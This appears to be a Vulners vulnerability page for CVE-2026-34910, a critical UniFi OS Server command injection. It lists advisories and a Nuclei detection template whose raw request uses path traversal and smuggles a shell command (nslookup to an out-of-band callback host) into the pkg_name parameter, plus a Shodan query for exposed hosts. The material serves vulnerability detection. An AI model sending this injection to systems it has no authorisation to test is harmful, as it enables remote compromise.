| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Exploit for CVE-2026-34908 | 5 Jun 202620:28 | – | githubexploit | |
| CVE-2026-34910 | 22 May 202600:43 | – | attackerkb | |
| The vulnerability of the UniFi OS Server network management center, related to insufficient validation of input data, allows a perpetrator to execute arbitrary commands. | 4 Jun 202600:00 | – | bdu_fstec | |
| CVE-2026-34910 | 22 May 202614:49 | – | circl | |
| Ubiquiti UniFi OS Improper Input Validation Vulnerability | 23 Jun 202600:00 | – | cisa_kev | |
| Ubiquiti UniFi OS Server 安全漏洞 | 22 May 202600:00 | – | cnnvd | |
| CVE-2026-34910 | 22 May 202600:43 | – | cve | |
| CVE-2026-34910 | 22 May 202600:43 | – | cvelist | |
| EUVD-2026-31382 | 22 May 202600:43 | – | euvd | |
| CVE-2026-34910 | 22 May 202602:16 | – | nvd |
id: CVE-2026-34910
info:
name: UniFi OS Server - Command Injection
author: Kazgangap
severity: critical
description: |
A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
impact: |
Network attackers can execute arbitrary commands, potentially leading to full system compromise.
remediation: |
Update to the latest version of UniFi OS.
reference:
- https://bishopfox.com/blog/popping-root-on-unifi-os-server-unauthenticated-rce-chain-detection-analysis
- https://nvd.nist.gov/vuln/detail/CVE-2026-34910
- https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b
- https://www.it-connect.tech/critical-3-exploit-chain-grants-root-access-on-unifi-os-server/
classification:
cve-id: CVE-2026-34910
epss-score: 0.78555
epss-percentile: 0.99536
cvss-score: 10.0
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
metadata:
verified: true
max-request: 1
shodan-query: html:"UniFi OS"
tags: cve,cve2026,unifi,rce,vkev,kev
http:
- raw:
- |
GET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+nslookup+{{interactsh-url}}+%3b HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains_any(body , "CODE_SYSTEM_ERROR", "System failure")'
- 'contains(interactsh_protocol, "dns")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100972ef957c1c049015f29a341416a78b109646103e7d02a57ea8f610e04e63a55022078a350efddf0d16a1cd7d436c913109afbd90145c821f3373f32915c6e81c49e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation